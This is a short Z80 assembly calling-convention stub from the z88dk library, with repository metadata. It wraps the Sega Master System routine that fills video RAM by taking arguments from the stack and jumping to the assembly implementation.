jpoikela/z88dk
|
7108b2d7e3a98a77de99b30c9a7c9199da9c75cb
|
[
"ClArtistic"
] | 640
|
2017-01-14T23:33:45.000Z
|
2022-03-30T11:28:42.000Z
|
libsrc/_DEVELOPMENT/arch/sms/vram/c/sccz80/sms_set_vram_callee.asm
|
jpoikela/z88dk
|
7108b2d7e3a98a77de99b30c9a7c9199da9c75cb
|
[
"ClArtistic"
] | 1,600
|
2017-01-15T16:12:02.000Z
|
2022-03-31T12:11:12.000Z
|
libsrc/_DEVELOPMENT/arch/sms/vram/c/sccz80/sms_set_vram_callee.asm
|
jpoikela/z88dk
|
7108b2d7e3a98a77de99b30c9a7c9199da9c75cb
|
[
"ClArtistic"
] | 215
|
2017-01-17T10:43:03.000Z
|
2022-03-23T17:25:02.000Z
|
; void *sms_set_vram(unsigned char c, unsigned int n)
SECTION code_clib
SECTION code_crt_common
PUBLIC sms_set_vram_callee
EXTERN asm_sms_set_vram
sms_set_vram_callee:
pop hl
pop bc
ex (sp),hl
ld a,l
jp asm_sms_set_vram
| 13.388889
| 53
| 0.759336
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.